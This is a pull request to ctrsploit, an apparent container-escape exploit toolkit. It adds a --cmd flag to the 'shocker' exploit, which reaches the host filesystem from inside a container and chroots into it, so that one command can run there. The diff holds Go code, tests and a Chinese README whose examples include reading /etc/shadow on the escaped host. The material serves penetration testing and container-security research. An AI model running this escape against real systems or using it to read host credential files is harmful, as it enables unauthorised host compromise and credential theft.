### PR TITLE
feat(vul/caps/shocker): add --cmd flag for one-off command

### DIFF
--- a/pkg/util/shell.go
+++ b/pkg/util/shell.go
@@ -365,3 +365,18 @@ func InvokeShellUnderDir(dir string, i io.Reader, o, e io.Writer) (err error) {
 	awesome_error.CheckFatal(cmd.Start())
 	return cmd.Wait()
 }
+
+// InvokeCommandUnderDir runs a single command (via /bin/sh -c) with its working
+// directory set to dir, instead of starting an interactive shell like
+// InvokeShellUnderDir. It is used to run a one-off command against an escaped
+// host filesystem without dropping into a shell.
+func InvokeCommandUnderDir(dir, command string, i io.Reader, o, e io.Writer) (err error) {
+	shell := "/bin/sh"
+	cmd := exec.Command(shell, "-c", command)
+	cmd.Dir = dir
+	cmd.Stdin = i
+	cmd.Stdout = o
+	cmd.Stderr = e
+	awesome_error.CheckFatal(cmd.Start())
+	return cmd.Wait()
+}

--- a/pkg/util/shell_test.go
+++ b/pkg/util/shell_test.go
@@ -127,3 +127,27 @@ func TestInvokeRootShellBySuReturnsContextWhenAllCandidatesFail(t *testing.T) {
 		}
 	}
 }
+
+func TestInvokeCommandUnderDirRunsCommandInDir(t *testing.T) {
+	dir := t.TempDir()
+	var stdout, stderr bytes.Buffer
+	err := InvokeCommandUnderDir(dir, "pwd", strings.NewReader(""), &stdout, &stderr)
+	if err != nil {
+		t.Fatalf("InvokeCommandUnderDir returned error: %v", err)
+	}
+	if got := strings.TrimSpace(stdout.String()); got != dir {
+		t.Fatalf("stdout = %q, want %q", got, dir)
+	}
+}
+
+func TestInvokeCommandUnderDirUsesShell(t *testing.T) {
+	// shell features (pipes/redirections) must work, since the command runs via /bin/sh -c
+	var stdout, stderr bytes.Buffer
+	err := InvokeCommandUnderDir(t.TempDir(), "echo hello | tr a-z A-Z", strings.NewReader(""), &stdout, &stderr)
+	if err != nil {
+		t.Fatalf("InvokeCommandUnderDir returned error: %v", err)
+	}
+	if got := strings.TrimSpace(stdout.String()); got != "HELLO" {
+		t.Fatalf("stdout = %q, want HELLO", got)
+	}
+}

--- a/vul/caps/shocker/README.md
+++ b/vul/caps/shocker/README.md
@@ -5,8 +5,9 @@ author: ssst0n3
 maintainer:
     - ssst0n3
 spec_version: v0.1.0
-version: v0.1.1
+version: v0.1.2
 changelog:
+    - v0.1.2: add --cmd flag to run a one-off command in the host fs cwd instead of an interactive shell
     - v0.1.1: fix the edit link
     - v0.1.0: init
 
@@ -158,7 +159,25 @@ $cat /proc/self/mountinfo |grep /dev/sd
 
 该参数默认为2 (每个文件系统的根目录的默认inode number)。
 
-### 6.3 Read-only file system
+### 6.3 `--cmd`
+
+默认情况下， `ctrsploit exploit shocker` 会逃逸到主机的 rootfs 并启动一个交互式的 shell。
+
+通过 `--cmd` （别名 `-c`）可以直接在主机文件系统的当前目录下执行一次命令，而不是进入交互式 shell。命令通过 `/bin/sh -c` 执行，因此支持管道、重定向等 shell 特性。
+
+```shell
+root@e33b98bef3c3:/# ctrsploit exploit shocker --cmd 'cat /etc/shadow'
+```
+
+```shell
+root@e33b98bef3c3:/# ctrsploit exploit shocker -c 'id; ls -lah / | head'
+```
+
+省略 `--cmd` 时行为保持不变（启动交互式 shell）。
+
+`--cmd` 仅在目标 inode 为目录时生效。若 `--inode` 指向普通文件（见 6.2），会打印告警并忽略 `--cmd`，改为输出该文件的 stat 信息与内容。
+
+### 6.4 Read-only file system
 
 有时成功逃逸到了主机的rootfs，但提示只读文件系统。
 

--- a/vul/caps/shocker/shocker.go
+++ b/vul/caps/shocker/shocker.go
@@ -9,11 +9,15 @@ import (
 	"syscall"
 
 	"github.com/ctrsploit/ctrsploit/pkg/util"
+	"github.com/ctrsploit/sploit-spec/pkg/log"
 	"github.com/ssst0n3/awesome_libs/awesome_error"
 	"golang.org/x/sys/unix"
 )
 
-func Exploit(inode int, ref string, i io.Reader, o, e io.Writer) (err error) {
+// Exploit opens the host filesystem object identified by inode/ref. When the
+// object is a directory, it enters it (chroot) and either starts an interactive
+// shell (command == "") or runs the given command once, in that order.
+func Exploit(inode int, ref, command string, i io.Reader, o, e io.Writer) (err error) {
 	fd, err := GetFd(inode, ref)
 	if err != nil {
 		return
@@ -25,11 +29,14 @@ func Exploit(inode int, ref string, i io.Reader, o, e io.Writer) (err error) {
 		return
 	}
 	if fi.IsDir() {
-		err = Chroot(fd, i, o, e)
+		err = Chroot(fd, command, i, o, e)
 		if err != nil {
 			return
 		}
 	} else {
+		if command != "" {
+			log.Logger.Warnf("--cmd is ignored: inode %d is a file, not a directory", inode)
+		}
 		fmt.Printf("stat: %+v\n", fi)
 		content, e := io.ReadAll(f)
 		if e != nil {
@@ -60,6 +67,10 @@ func GetFd(inode int, ref string) (fd int, err error) {
 	return
 }
 
-func Chroot(rootFd int, i io.Reader, o, e io.Writer) (err error) {
-	return util.InvokeShellUnderDir(fmt.Sprintf("/proc/self/fd/%d", rootFd), i, o, e)
+func Chroot(rootFd int, command string, i io.Reader, o, e io.Writer) (err error) {
+	dir := fmt.Sprintf("/proc/self/fd/%d", rootFd)
+	if command == "" {
+		return util.InvokeShellUnderDir(dir, i, o, e)
+	}
+	return util.InvokeCommandUnderDir(dir, command, i, o, e)
 }

--- a/vul/caps/shocker/shocker_test.go
+++ b/vul/caps/shocker/shocker_test.go
@@ -46,7 +46,7 @@ func TestE2E_Exploit(t *testing.T) {
 			go func() {
 				defer inWriter.Close()
 				defer outReader.Close()
-				err := Exploit(2, "/etc/hosts", inReader, outWriter, outWriter)
+				err := Exploit(2, "/etc/hosts", "", inReader, outWriter, outWriter)
 				assert.NoError(t, err)
 			}()
 			for _, command := range testcase.commands {

--- a/vul/caps/shocker/vul.go
+++ b/vul/caps/shocker/vul.go
@@ -26,6 +26,12 @@ var (
 			Required:    false,
 			Value:       "/etc/hosts",
 		},
+		&cli.StringFlag{
+			Name:     "cmd",
+			Aliases:  []string{"c"},
+			Usage:    "run a command in the host filesystem cwd instead of starting an interactive shell",
+			Required: false,
+		},
 	}
 	ExploitCmd  = app.Vul2ExploitCmd(&Vul, aliases, flagsExploit, true)
 	CheckSecCmd = app.Vul2ChecksecCmd(&Vul, aliases, nil)
@@ -58,5 +64,6 @@ func (v *vulnerability) Exploit(cmd *cli.Command) (err error) {
 	}
 	inode := cmd.Int("inode")
 	ref := cmd.String("reference")
-	return Exploit(inode, ref, os.Stdin, os.Stdout, os.Stderr)
+	command := cmd.String("cmd")
+	return Exploit(inode, ref, command, os.Stdin, os.Stdout, os.Stderr)
 }


### PR DESCRIPTION
Add a --cmd / -c flag to the shocker exploit to run a single command (via /bin/sh -c) in the host filesystem instead of starting an interactive shell. The new utility function InvokeCommandUnderDir in pkg/util/shell.go supports this by executing a command under a given directory.

When the target inode points to a regular file (not a directory), --cmd is ignored and a warning is printed; the exploit falls back to displaying file stat and content as before.

Update the shocker README (Chinese) with documentation for the new flag, and add unit tests for InvokeCommandUnderDir.